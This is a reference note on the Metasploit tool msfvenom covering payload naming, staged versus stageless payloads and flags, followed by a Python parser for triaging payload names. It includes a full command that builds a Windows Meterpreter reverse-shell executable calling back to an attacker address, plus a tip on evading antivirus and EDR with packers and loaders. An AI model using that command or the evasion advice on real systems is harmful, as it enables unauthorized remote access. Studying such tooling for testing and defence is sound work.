# msfvenom

Tags: #msfvenom #payloads #Metasploit #Meterpreter
Links:

---

## **Definition:**

**msfvenom** is a powerful [[Payloads|payload]] generation tool that's part of the **Metasploit Framework**. It combines the functionality of `msfpayload` and `msfencode` (both now deprecated) into one utility, allowing attackers and red teamers to **generate shellcode, encode it, and package it into various formats**, like executables, scripts, or even Office macros.

---

## **What It Does:**

- Generates **payloads** for different platforms (Windows, Linux, macOS, Android, etc.)
- Supports **staged** and **stageless** payloads
- Allows **encoding** payloads to bypass antivirus or filters
- Outputs to multiple formats (EXE, DLL, ELF, APK, ASP, PS1, etc.)

---

## **Naming Convention Format:**

`<platform>/<payload_type>/<communication_method>` or `<OS>/<arch>/<payload>`

**Breakdown:**

- **Platform**: OS the payload targets (`windows`, `linux`, `android`, `osx`, `php`, etc.)
- **Payload Type**: Shell or Meterpreter (`shell`, `meterpreter`, etc.)
- **Comm. Method**: How it connects (`reverse_tcp`, `bind_tcp`, `reverse_http`, etc.)

**Examples:**

- `windows/meterpreter/reverse_tcp` – staged reverse shell using Meterpreter
- `linux/x86/shell_bind_tcp` – stageless bind shell for Linux
- `windows/shell_reverse_tcp` – 32-bit Windows targets do not need the arch specified
- `android/meterpreter/reverse_http` – Meterpreter payload for Android using HTTP
- `osx/x64/shell_reverse_tcp` – reverse shell payload for macOS

## Staged vs Stageless

In the examples above, the payload `shell_reverse_tcp` is a _stageless_ payload. How can you tell? Stageless payloads join the payload type and communication method with an underscore (`_`).
The staged equivalent of this payload separates them with a slash: `shell/reverse_tcp`. The same rule applies to Meterpreter payloads, e.g. `windows/x64/meterpreter/reverse_tcp` is staged.

---

## **Example Use**

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o payload.exe`

**Flags Explained:**

- `-p`: Payload name
- `LHOST`: Attacker's IP address
- `LPORT`: Listening port
- `-f`: Format (exe, elf, raw, etc.)
- `-o`: Output file

`msfvenom --list payloads` lists all available payloads; pipe its output into `grep` when searching for a specific payload.

---

## **Why It Matters:**

msfvenom is essential in red teaming and penetration testing for crafting custom payloads tailored to specific exploits or evasion strategies.

## **Risks (if abused):**

- Malware creation
- Remote access backdoors
- Antivirus evasion

---

**Pro Tip:** Combine with **obfuscation**, **packers**, or **custom loaders** to bypass modern EDR/AV.

---
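As an added example (not part of msfvenom or the Metasploit project), the following Python parser applies the naming convention and the staged/stageless underscore rule from the sections above to classify a payload path, which is useful when triaging payload names that show up in reports, alerts or detection rules. The `ARCHES` set and `COMM_PREFIXES` tuple are assumptions for this example, not an exhaustive Metasploit list.

```python
"""Classify a Metasploit payload path using the naming convention described
in this note (added example; not code from msfvenom itself)."""
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may follow the platform. Assumed set, not exhaustive.
ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc", "sparc"}
# Prefixes that mark the connection method inside a stageless module name.
COMM_PREFIXES = ("reverse_", "bind_")


@dataclass(frozen=True)
class PayloadName:
    platform: str
    arch: Optional[str]          # None when omitted (32-bit is the default on windows)
    payload_type: str            # e.g. "shell" or "meterpreter"
    comm_method: Optional[str]   # e.g. "reverse_tcp"; None for payloads with no connection
    staged: bool                 # "type/comm" => staged, "type_comm" => stageless


def parse_payload_name(name: str) -> PayloadName:
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in ARCHES else None
    if len(rest) == 2:
        # A slash between type and method means a stager plus a stage: staged.
        return PayloadName(platform, arch, rest[0], rest[1], staged=True)
    if len(rest) != 1:
        raise ValueError(f"unexpected payload path shape: {name!r}")
    token = rest[0]
    # An underscore joins type and method into one stageless module name.
    for prefix in COMM_PREFIXES:
        idx = token.find("_" + prefix)
        if idx > 0:
            return PayloadName(platform, arch, token[:idx], token[idx + 1:], staged=False)
    # No connection method at all (e.g. a local command-execution payload).
    return PayloadName(platform, arch, token, None, staged=False)


def describe(name: str) -> str:
    """One-line human-readable summary, in the style of the examples above."""
    p = parse_payload_name(name)
    stage = "staged" if p.staged else "stageless"
    arch = p.arch or ("x86 (implicit)" if p.platform == "windows" else "default")
    conn = f" via {p.comm_method}" if p.comm_method else ""
    return f"{stage} {p.payload_type} payload for {p.platform}/{arch}{conn}"
```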